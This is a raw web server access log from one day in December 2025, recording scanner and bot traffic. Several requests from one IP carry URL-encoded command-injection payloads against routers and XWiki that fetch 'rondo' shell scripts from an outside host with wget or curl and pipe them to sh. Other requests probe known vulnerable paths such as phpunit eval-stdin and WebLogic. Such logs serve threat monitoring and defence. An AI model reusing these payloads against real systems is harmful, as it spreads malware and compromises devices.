18.97.19.142 - - [03/Dec/2025:00:10:02 +0100] "GET / HTTP/1.1" 200 1895 204.76.203.52 - - [03/Dec/2025:00:22:31 +0100] "GET / HTTP/1.1" 200 1895 54.157.236.122 - - [03/Dec/2025:00:38:21 +0100] "GET / HTTP/1.1" 200 1895 176.65.148.40 - - [03/Dec/2025:00:51:30 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 18.97.5.41 - - [03/Dec/2025:01:16:02 +0100] "GET / HTTP/1.1" 200 1895 65.108.234.28 - - [03/Dec/2025:01:51:54 +0100] "-" 400 1930 198.235.24.124 - - [03/Dec/2025:01:59:11 +0100] "-" 400 1930 198.235.24.124 - - [03/Dec/2025:01:59:11 +0100] "-" 400 1930 204.76.203.52 - - [03/Dec/2025:02:21:50 +0100] "GET / HTTP/1.1" 200 1895 205.210.31.195 - - [03/Dec/2025:04:00:25 +0100] "GET / HTTP/1.0" 200 1895 192.159.99.95 - - [03/Dec/2025:04:07:37 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "GET null HTTP/1.1" 400 1994 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "POST /goform/mp HTTP/1.1" 404 731 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "POST /diagnostic.php HTTP/1.1" 404 732 192.159.99.95 - - [03/Dec/2025:04:07:38 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "GET /HNAP1/ HTTP/1.1" 404 728 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F70.184.13.47%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "GET /?doAs=%60%28wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.pms.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.pms.sh%7C%7Ccurl%20-s%20http%3A%2F%2F70.184.13.47%2Frondo.pms.sh%29%7Csh%60 HTTP/1.1" 200 1895 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 743 192.159.99.95 - - [03/Dec/2025:04:07:39 +0100] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 744 74.235.185.122 - - [03/Dec/2025:04:41:36 +0100] "GET / HTTP/1.1" 200 1895 74.235.185.122 - - [03/Dec/2025:04:41:36 +0100] "-" 400 1930 185.180.140.106 - - [03/Dec/2025:04:54:35 +0100] "GET / HTTP/1.1" 200 1895 18.97.19.147 - - [03/Dec/2025:05:26:27 +0100] "GET / HTTP/1.1" 200 1895 36.156.22.4 - - [03/Dec/2025:05:36:09 +0100] "-" 400 1930 36.156.22.4 - - [03/Dec/2025:05:36:16 +0100] "GET / HTTP/1.1" 200 1895 36.156.22.4 - - [03/Dec/2025:05:36:16 +0100] "-" 400 1930 36.156.22.4 - - [03/Dec/2025:05:36:17 +0100] "-" 400 1930 36.156.22.4 - - [03/Dec/2025:05:36:17 +0100] "GET /favicon.ico HTTP/1.1" 404 729 36.156.22.4 - - [03/Dec/2025:05:36:17 +0100] "GET /robots.txt HTTP/1.1" 404 728 36.156.22.4 - - [03/Dec/2025:05:36:18 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 746 36.156.22.4 - - [03/Dec/2025:05:36:18 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 36.156.22.4 - - [03/Dec/2025:05:36:19 +0100] "GET /llms.txt HTTP/1.1" 404 726 18.97.19.169 - - [03/Dec/2025:06:10:39 +0100] "GET / HTTP/1.1" 200 1895 176.65.148.246 - - [03/Dec/2025:07:16:59 +0100] "GET / HTTP/1.0" 200 1895 64.62.156.152 - - [03/Dec/2025:07:21:42 +0100] "GET / HTTP/1.1" 200 1895 64.62.156.153 - - [03/Dec/2025:07:22:05 +0100] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.154 - - [03/Dec/2025:07:22:20 +0100] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.154 - - [03/Dec/2025:07:22:25 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.156.152 - - [03/Dec/2025:07:22:30 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740 45.156.129.132 - - [03/Dec/2025:08:00:12 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "GET null HTTP/1.1" 400 1994 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "POST /goform/mp HTTP/1.1" 404 731 192.159.99.95 - - [03/Dec/2025:08:05:30 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "POST /diagnostic.php HTTP/1.1" 404 732 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "GET /HNAP1/ HTTP/1.1" 404 728 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F70.184.13.47%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [03/Dec/2025:08:05:31 +0100] "GET /?doAs=%60%28wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.pms.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.pms.sh%7C%7Ccurl%20-s%20http%3A%2F%2F70.184.13.47%2Frondo.pms.sh%29%7Csh%60 HTTP/1.1" 200 1895 192.159.99.95 - - [03/Dec/2025:08:05:32 +0100] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 743 192.159.99.95 - - [03/Dec/2025:08:05:32 +0100] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 744 178.255.49.191 - - [03/Dec/2025:08:18:44 +0100] "GET / HTTP/1.0" 200 1895 5.175.249.126 - - [03/Dec/2025:08:39:24 +0100] "GET / HTTP/1.1" 200 1895 5.175.249.126 - - [03/Dec/2025:08:39:24 +0100] "GET / HTTP/1.1" 200 1895 5.175.249.126 - - [03/Dec/2025:08:39:24 +0100] "GET / HTTP/1.1" 200 1895 5.175.249.126 - - [03/Dec/2025:08:39:24 +0100] "GET / HTTP/1.1" 200 1895 5.175.249.126 - - [03/Dec/2025:08:39:24 +0100] "GET / HTTP/1.1" 200 1895 45.9.168.192 - - [03/Dec/2025:09:35:04 +0100] "-" 400 1930 45.9.168.192 - - [03/Dec/2025:09:35:04 +0100] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 176.65.148.40 - - [03/Dec/2025:09:48:48 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.47.190 - - [03/Dec/2025:10:30:39 +0100] "GET / HTTP/1.1" 200 1895 87.121.47.190 - - [03/Dec/2025:10:30:41 +0100] "GET / HTTP/1.1" 200 1895 87.121.47.190 - - [03/Dec/2025:10:30:45 +0100] "GET / HTTP/1.1" 200 1895 87.121.47.190 - - [03/Dec/2025:10:30:49 +0100] "GET / HTTP/1.1" 200 1895 87.121.47.190 - - [03/Dec/2025:10:30:49 +0100] "GET / HTTP/1.1" 200 1895 64.62.156.52 - - [03/Dec/2025:10:34:37 +0100] "-" 400 1930 3.131.215.38 - - [03/Dec/2025:10:56:37 +0100] "GET / HTTP/1.1" 200 1895 3.131.215.38 - - [03/Dec/2025:10:56:38 +0100] "GET / HTTP/1.1" 200 1895 196.61.100.43 - - [03/Dec/2025:11:00:13 +0100] "GET / HTTP/1.1" 200 1895 3.131.215.38 - - [03/Dec/2025:11:00:58 +0100] "-" 400 1930 3.131.215.38 - - [03/Dec/2025:11:01:26 +0100] "-" 400 1930 3.131.215.38 - - [03/Dec/2025:11:02:08 +0100] "-" 400 1930 111.230.203.228 - - [03/Dec/2025:11:05:21 +0100] "-" 400 1930 91.238.181.94 - - [03/Dec/2025:11:18:32 +0100] "-" 400 1930 176.65.148.40 - - [03/Dec/2025:11:19:08 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 101.36.97.88 - - [03/Dec/2025:12:05:51 +0100] "GET / HTTP/1.1" 200 1895 101.36.97.88 - - [03/Dec/2025:12:05:51 +0100] "-" 400 1930 101.36.106.134 - - [03/Dec/2025:12:06:35 +0100] "GET / HTTP/1.1" 200 1895 101.36.106.134 - - [03/Dec/2025:12:06:36 +0100] "GET /favicon.ico HTTP/1.1" 404 729 101.36.106.134 - - [03/Dec/2025:12:06:36 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 101.36.106.134 - - [03/Dec/2025:12:06:36 +0100] "GET /robots.txt HTTP/1.1" 404 728 101.36.106.134 - - [03/Dec/2025:12:06:38 +0100] "GET null HTTP/1.1" 400 1994 101.36.106.134 - - [03/Dec/2025:12:06:38 +0100] "GET /struts/webconsole.html HTTP/1.1" 404 744 101.36.106.134 - - [03/Dec/2025:12:06:39 +0100] "GET /?actionErrors=1111 HTTP/1.1" 200 1895 101.36.106.134 - - [03/Dec/2025:12:06:39 +0100] "GET /invoker/readonly HTTP/1.1" 404 738 4.227.178.199 - - [03/Dec/2025:12:21:02 +0100] "GET /actuator/health HTTP/1.1" 404 737 44.220.185.196 - - [03/Dec/2025:13:09:30 +0100] "GET / HTTP/1.1" 200 1895 213.209.143.84 - - [03/Dec/2025:13:43:52 +0100] "GET / HTTP/1.1" 200 1895 151.243.109.152 - - [03/Dec/2025:14:26:20 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 185.16.39.146 - - [03/Dec/2025:14:33:26 +0100] "GET / HTTP/1.1" 200 1895 20.12.240.164 - - [03/Dec/2025:15:14:57 +0100] "GET / HTTP/1.1" 200 1895 20.12.240.164 - - [03/Dec/2025:15:14:57 +0100] "-" 400 1930 3.148.219.221 - - [03/Dec/2025:15:47:43 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 45.135.193.9 - - [03/Dec/2025:16:07:01 +0100] "GET /json/ HTTP/1.1" 404 727 151.243.109.152 - - [03/Dec/2025:16:26:43 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 151.243.109.152 - - [03/Dec/2025:16:26:43 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 151.243.109.152 - - [03/Dec/2025:16:29:33 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 151.243.109.152 - - [03/Dec/2025:16:29:33 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.38.44.221 - - [03/Dec/2025:17:16:19 +0100] "GET /login HTTP/1.1" 404 723 62.60.135.165 - - [03/Dec/2025:17:36:28 +0100] "-" 400 1930 79.124.40.86 - - [03/Dec/2025:18:45:16 +0100] "HEAD / HTTP/1.0" 200 - 44.220.185.204 - - [03/Dec/2025:18:58:25 +0100] "GET / HTTP/1.1" 200 1895 173.239.217.29 - - [03/Dec/2025:18:59:05 +0100] "-" 400 1930 62.133.47.146 - - [03/Dec/2025:18:59:05 +0100] "GET / HTTP/1.1" 200 1895 62.133.47.146 - - [03/Dec/2025:18:59:05 +0100] "GET /favicon.ico HTTP/1.1" 404 729 20.115.90.12 - - [03/Dec/2025:19:05:31 +0100] "-" 400 1930 188.4.111.60 - - [03/Dec/2025:19:11:27 +0100] "GET / HTTP/1.1" 200 1895 173.0.55.218 - - [03/Dec/2025:19:35:47 +0100] "GET / HTTP/1.1" 200 1895 173.0.55.218 - - [03/Dec/2025:19:55:51 +0100] "CONNECT icanhazip.com:443 HTTP/1.1" 400 804 167.94.138.195 - - [03/Dec/2025:19:59:21 +0100] "-" 400 1930 167.94.138.195 - - [03/Dec/2025:19:59:23 +0100] "GET / HTTP/1.1" 200 1895 167.94.138.195 - - [03/Dec/2025:19:59:33 +0100] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.195 - - [03/Dec/2025:19:59:39 +0100] "-" 400 1930 167.94.138.195 - - [03/Dec/2025:19:59:41 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 746 162.142.125.205 - - [03/Dec/2025:20:03:34 +0100] "-" 400 1930 162.142.125.205 - - [03/Dec/2025:20:03:41 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.205 - - [03/Dec/2025:20:03:47 +0100] "GET /favicon.ico HTTP/1.1" 404 729 162.142.125.205 - - [03/Dec/2025:20:05:12 +0100] "-" 400 1930 162.142.125.205 - - [03/Dec/2025:20:05:17 +0100] "GET /wiki HTTP/1.1" 404 722 45.135.193.9 - - [03/Dec/2025:20:20:17 +0100] "GET /json/ HTTP/1.1" 404 727 173.0.55.218 - - [03/Dec/2025:20:29:18 +0100] "CONNECT www.cloudflare.com:443 HTTP/1.1" 400 804 45.156.128.131 - - [03/Dec/2025:20:55:44 +0100] "GET / HTTP/1.1" 200 1895 173.0.55.218 - - [03/Dec/2025:21:24:03 +0100] "CONNECT www.cloudflare.com:443 HTTP/1.1" 400 804 147.185.132.49 - - [03/Dec/2025:21:27:29 +0100] "-" 400 1930 147.185.132.49 - - [03/Dec/2025:21:27:29 +0100] "-" 400 1930 45.38.44.221 - - [03/Dec/2025:21:29:29 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 167.99.245.86 - - [03/Dec/2025:21:44:46 +0100] "GET / HTTP/1.0" 200 1895 134.122.72.52 - - [03/Dec/2025:21:44:47 +0100] "GET /v2/_catalog HTTP/1.1" 404 733 134.122.72.52 - - [03/Dec/2025:21:44:47 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 46.101.225.54 - - [03/Dec/2025:21:44:47 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 752 142.93.171.56 - - [03/Dec/2025:21:44:47 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 134.122.72.52 - - [03/Dec/2025:21:44:47 +0100] "-" 400 1930 46.101.225.54 - - [03/Dec/2025:21:44:47 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 134.122.72.52 - - [03/Dec/2025:21:44:47 +0100] "-" 400 1930 142.93.171.56 - - [03/Dec/2025:22:01:44 +0100] "GET / HTTP/1.1" 200 1895 161.35.67.194 - - [03/Dec/2025:22:01:45 +0100] "GET / HTTP/1.1" 200 1895 161.35.67.194 - - [03/Dec/2025:22:01:45 +0100] "-" 400 1930 174.138.27.103 - - [03/Dec/2025:22:01:45 +0100] "GET /favicon.ico HTTP/1.1" 404 729 198.235.24.231 - - [03/Dec/2025:22:04:28 +0100] "GET / HTTP/1.1" 200 1895